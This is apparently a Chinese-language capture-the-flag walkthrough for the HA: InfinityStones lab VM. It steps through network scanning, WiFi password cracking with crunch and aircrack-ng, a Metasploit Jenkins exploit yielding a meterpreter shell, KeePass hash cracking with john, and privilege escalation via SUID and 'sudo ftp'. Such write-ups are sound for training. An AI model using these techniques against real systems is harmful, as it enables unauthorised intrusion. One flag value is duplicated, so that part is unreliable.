HA: InfinityStones靶机渗透测试

文章目录

靶机信息
一、信息收集
- 1.主机发现
- 2.端口扫描
- 3.目录扫描
二、漏洞挖掘
- 1.访问 192.168.1.108
- 2.访问 /img 目录
- 3.访问 https 服务（443）端口
- 4.查看 /wifi/ 路径
- 5.访问 /aether.php 页面
- 6.访问 8080 端口
- 7.ssh 登陆 morag 账户

靶机信息

灭霸认为，如果他杀死了宇宙中所有生命的一半，将恢复平衡。
为此，他需要所有六块无限宝石来驱动无限手套，这反过来又使他能够弯曲时间，空间，能量以及物理和现实定律。
但是这次复仇者联盟比灭霸领先一步。
复仇者联盟在这个CTF中隐藏了所有无限宝石。
帮助灭霸获得所有无限宝石并恢复宇宙的平衡。该机器包含6种带有6种不同标志的无限宝石来测试您的技能，找出它们。

简单来说就是有6个flag，拿到它

一、信息收集

1.主机发现

arp-scan -l

2.端口扫描

nmap -A -p- 192.168.1.108

发现开放了 22 ssh 服务；80 apache；443 ssl；8080 jetty 框架

3.目录扫描

dirb http://192.168.1.108

发现三个目录

二、漏洞挖掘

1.访问 192.168.1.108

访问主页发现宝石图片切换及靶机信息和复联任务图片

2.访问 /img 目录

将图片保存到电脑，查看信息

exiftool space.jpg

得到 SPACESTONE

SPACESTONE:{74E57403424607145B9B77809DEB49D0}

3.访问 https 服务（443）端口

https://192.168.1.108/

查看证书
查看更多信息

得到 MINDSTONE

MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

4.查看 /wifi/ 路径

发现两个文件，下载文件并查看
发现流量文件是 wifi 数据包，
发现 pwd.txt 文件是密码构成：

gam 开头
一个大写字母
2个数字
2个小写字母
复联第一次上映年份（这里影院写成了威胁）

1)生成字典

crunch 12 12 -t gam,%%@@2012 -o dict.txt

2)查找 wifi-key

aircrack-ng -w ./dict.txt /root/Downloads/reality.cap

发现密码是 gamA00fe2012
3)访问 http://192.168.1.108/gamA00fe2012/
得到 REALITYSTONE

REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

5.访问 /aether.php 页面

发现 8 个问题，正确解答并转为二进制得到 01101001
1)访问 /01101001/ 路径

http://192.168.1.108/01101001/

发现 hints.txt，查看发现是 Brainfuck 编码
在 https://www.splitbrain.org/services/ook 解码得到 admin:avengers

6.访问 8080 端口

发现 jenkins 框架
1)使用 msfconsole 对其进行渗透

msfconsole
search jenkins
use 11

set target 1    #设置目标系统类型
show payloads    #查看可用payload
set payload 14    #选择对应payload
set rhosts 192.168.1.108    #设置靶机ip
set rport 8080    #设置端口
set  targeturi /    #设置路径
set username admin    #设置用户名
set password avengers    #设置密码
run    #开始利用

得到 meterpreter shell
2)get 新 shell

shell

3)尝试 suid 提权

find / -perm -u=s -type f 2>/dev/null

发现 /opt/script 文件
4)使用 python3 get 交互 shell，查看所有用户，执行 script

python3 -c "import pty;pty.spawn('/bin/bash')"
/opt/script

发现 morag、stones 账户
得到 TIMESTONE

TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}

5)查看 /opt/ 目录下所有文件

cd /opt
ls

发现 morag.kdbx 文件
6)使用 meterpreter shell 获取文件

meterpreter > download /opt/mor*

7)执行 morag.kdbx

apt-get install keepassx    #安装keepassx
keepassx ./morag.kdbx

执行发现需要密码

8)破解密码

keepass2john morag.kdbx > morag.hash
john morag.hash

得到密码 princesa，输入

打开后发现有 flag 字样，双击右边的 power stone 查看其值

得到 POWERSTONE

POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}

打开 creds 列，发现疑似 base64 代码，尝试解密

echo 'bW9yYWc6eW9uZHU=' | base64 -d

发现是 morag 账户的密码

7.ssh 登陆 morag 账户

因为我们已知靶机开放了 ssh 所以我们直接登陆即可

ssh morag@192.168.1.108
yondu

接着常规操作 sudo 提权

sudo -l
sudo ftp
!/bin/bash    # !表示在ftp中执行系统命令并返回
cd /root
cat f*

得到 SOULSTONE

SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}

至此，六个 flag 全部集齐